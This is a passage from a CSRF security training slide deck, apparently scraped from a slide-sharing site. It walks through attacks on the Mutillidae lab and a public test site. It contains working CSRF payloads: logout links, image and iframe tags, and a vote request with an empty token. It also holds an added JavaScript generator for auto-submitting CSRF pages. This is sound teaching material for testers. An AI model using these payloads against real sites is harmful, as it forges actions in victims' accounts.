Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdf
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 

Oh no, was that CSRF #Ouch

  • 1.   OH NO, WAS THAT  CSRF ? Abhinav Sejpal
  • 2. WHO AM I I'm a new-generation exploratory tester. Researcher & reader in free time. Speaker at Null & OWASP community. Facilitator at Weekend Testing. Crowd tester (aka bug bounty hunter). Reported security vulnerabilities for 50+ unique customers all over the world, including Apple, Yahoo, Outlook, Adobe, etc. Proficient at functional, usability, accessibility & compatibility testing. Love to develop nasty code & hack it :) Works as Quality Analyst at passbrains.com. AKA Bug Wrangler.
  • 4. DISCLAIMER This presentation is intended for educational purposes only and I cannot be held liable for any kind of damage done whatsoever to your machine, or other damages. Please don't try this attack on any other system without context knowledge or permission; this may harm someone directly or indirectly. Feel free to use this presentation for practice or education purposes. ^ I hope you gotcha ^
  • 5. SOCIAL MEDIA FEED Hashtags for this session: #BitzNightTesting, #CSRF. Twitter handles for feedback: @weekendtesting, @Abhinav_Sejpal. G+: http://goo.gl/kMAOs1
  • 6. AGENDA Introduction. Set up the pen testing lab. Overview of the HTTP request. Intercept the HTTP request using a proxy (MITM). Understanding cross-site attacks. Testing for a cross-site request forgery risk. Attacks on anti-forgery protection. Common defences against CSRF.
  • 7. SET UP THE TEST LAB Install XAMPP. Acronym for: X (to be read as "cross", meaning cross-platform), Apache HTTP Server, MySQL, PHP, Perl.
  • 8. TARGETED APPLICATION Client-side language: HTML & JavaScript. Server-side language: PHP. DB: MySQL. Why PHP? - Any answer here? Why MySQL? MySQL is the girlfriend of PHP <3
  • 9. PHP IS USED BY 82.2% OF ALL WEBSITES AS THEIR SERVER-SIDE PROGRAMMING LANGUAGE. Source: http://w3techs.com/technologies/overview/programming_lang
  • 10. PHP: 244M SITES 2.1M IP ADDRESSES
  • 11. 2013 Server-side Programming Language of the Year. Don't mind the power of PHP > Facebook & Yahoo. http://w3techs.com/blog/entry/web_technologies_of_the_year
  • 12. PLAY GROUND: MUTILLIDAE It's a free, open source web application provided to allow security enthusiasts to pen-test and hack a web application. V2.x developed by Jeremy Druin aka webpwnized.
  • 13. ALL SET WITH MUTILLIDAE?
  • 14. AM I VULNERABLE TO 'CSRF' ?
  • 15. OWASP A8 - CSRF CROSS-SITE REQUEST FORGERY
  • 20. Proxy (man in the middle): intercept the requests & responses from the client.
  • 22. CSRF AKA XSRF THE ATTACKER EXPLOITS THE TRUST A WEBSITE HAS IN A USER'S BROWSER. Permission faking/stealing. Disruption of the normal sequence of the site.
  • 23. DEMO #1 HTTP GET request. Login ID - admin, password - adminpass. http://127.0.0.1/xampp/mutillidae/index.php?do=logout
  • 24. ANSWER DEMO 1: <html> <title> CSRF Demo 1 </title> <a href="http://127.0.0.1/xampp/mutillidae/index.php?do=logout"> Click me </a> </html>
  • 25. UNDERSTANDING The logout page is a simple HTTP GET that requires no confirmation. Every user who visited that page would immediately be logged out - that's CSRF in action. Yes, it's not dangerous, but it is annoying.
  • 26. SO WHAT DO YOU THINK, IT'S ALL ABOUT THE CLICK? Shh, no!! Would you like to write a CSRF exploit without a click?
  • 27. CSRF GET request with an image tag: <html> <title> CSRF Demo 1 </title> <img src="http://127.0.0.1/xampp/mutillidae/index.php?do=logout"> </html>
  • 28. HTTP REQUEST <iframe src="http://127.0.0.1/xampp/mutillidae/index.php?do=logout"></iframe> <script> var X = new Image(); X.src = "http://127.0.0.1/xampp/mutillidae/index.php?do=logout"; </script>
  • 30. :: SOLUTION #1 :: <html> <title> CSRF Demo 1 </title> <a href="http://127.0.0.1/xampp/mutillidae/index.php?page=user-poll.php&csrf-token=&choice=nmap&initials=n&user-poll-php-submit-button=Submit+Vote"> Click me </a> </html> (note that the csrf-token parameter is sent empty)
  • 31. IS IT EASY TO CREATE A CSRF HTTP REQUEST? No - you should try out IronWASP's CSRF PoC Generator - a tool for automatically generating exploits for CSRF vulnerabilities. * One-click PoC * * Hybrid automation * Thanks a ton to Lava & Jayesh.
  • 33. CHALLENGE #2 { POST HTTP request }
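Slides 27, 28, 30 and 33 all rest on one trick: wrap a request in a page so that the victim's browser sends it with the victim's session cookie attached. The block below is an added example, not code from the slides or from IronWASP: it does what the slide says the CSRF PoC Generator automates, building a no-click GET PoC (an img tag) or a POST PoC (a hidden form that submits itself) from a captured request. The Mutillidae URL and parameter names are the ones on the slides; that the Challenge #2 vote is submitted over POST with those same parameters is an assumption made for the demo.

```javascript
// Escape a value for a double-quoted HTML attribute so the generated page
// stays well-formed whatever the captured request contained.
function escapeAttr(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Serialise captured parameters as a query string (GET PoCs only).
function toQueryString(params) {
  return Object.entries(params)
    .map(([k, v]) => encodeURIComponent(k) + '=' + encodeURIComponent(v))
    .join('&');
}

// Build the PoC page. A GET request rides on an <img> tag, so it fires
// without a click (slide 27). A POST request needs a hidden form that
// submits itself on load. The victim's browser attaches the session
// cookie to both, which is the whole point of CSRF.
function buildCsrfPoc(request) {
  const method = String(request.method).toUpperCase();
  const params = request.params || {};
  let body;
  if (method === 'GET') {
    const qs = toQueryString(params);
    const sep = request.url.includes('?') ? '&' : '?';
    const target = qs ? request.url + sep + qs : request.url;
    body = '<img src="' + escapeAttr(target) + '" alt="">';
  } else if (method === 'POST') {
    const inputs = Object.entries(params)
      .map(([k, v]) => '  <input type="hidden" name="' + escapeAttr(k) +
                       '" value="' + escapeAttr(v) + '">')
      .join('\n');
    body = [
      '<form id="csrf" method="POST" action="' + escapeAttr(request.url) + '">',
      inputs,
      '</form>',
      '<script>document.getElementById("csrf").submit();</script>',
    ].join('\n');
  } else {
    throw new Error('unsupported method: ' + method);
  }
  return '<html>\n<title>CSRF PoC</title>\n' + body + '\n</html>';
}

// Constructed sample requests. LOGOUT_GET is the request from slides 23-28.
// POLL_POST reuses the user-poll parameters from slide 30 and assumes the
// Challenge #2 vote goes over POST; the csrf-token is sent empty, as on
// slide 30, to test whether the server accepts a missing token.
const LOGOUT_GET = {
  method: 'GET',
  url: 'http://127.0.0.1/xampp/mutillidae/index.php',
  params: { 'do': 'logout' },
};
const POLL_POST = {
  method: 'POST',
  url: 'http://127.0.0.1/xampp/mutillidae/index.php?page=user-poll.php',
  params: {
    'csrf-token': '',
    choice: 'nmap',
    initials: 'n',
    'user-poll-php-submit-button': 'Submit Vote',
  },
};
```

Save `buildCsrfPoc(POLL_POST)` to a file, open it in the browser that is logged in to Mutillidae, and then check the poll results: if the vote landed, the token is not being validated, which is exactly what the later levels of the challenge ask you to find out.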
  • 34. CHALLENGE #3 Add a user without the admin's knowledge.
  • 35. LIVE CHALLENGE CSRF & XSRF: update the user info without their knowledge. http://testphp.vulnweb.com/userinfo.php * SIGNUP DISABLED * PLEASE USE THE USERNAME TEST AND THE PASSWORD TEST. Copyright © 2014, Acunetix Ltd
  • 36. Can we exploit this with Level #2? You've been CSRF'd with a static token!
  • 37. Let's try Level 3.
  • 38. ~ Keep hacking your code ~ There is no silver bullet to stop this - just trust your code.
  • 39. POPULAR COOL FINDINGS Facebook CSRF worth USD 5000 (by Amol). Google Groups profile CSRF. Google Account display pic deletion. Facebook account deactivation. Advanced learning - CSRF token validation fail: http://haiderm.com/csrf-token-protection-bypass-methods/
  • 40. INDIAN HACKERS/INFOSEC GUYS & GROUPS YOU SHOULD BE FOLLOWING ON TWITTER: the http://garage4hackers.com/ community. Thank you!
  • 41. CREDITS - Twitter folks - @riyazwalikar, @TroyHunt, @yog3sharma, @makash & @anatshri. Big thank you to @weekendtesting, @srinivasskc & you all.
  • 42. YES - I'M DONE! Feel free to write to me at bug.wrangler at outlook.com
  • 43. LICENSE AND COPYRIGHTS https://slides.com/abhinavsejpal/weekend-testing-csrf Copyright 2013-2014 Abhinav Sejpal ----- (CC BY-NC-ND 3.0) Attribution-NonCommercial-NoDerivs 3.0 Unported. Dedicated to my lovely daddy.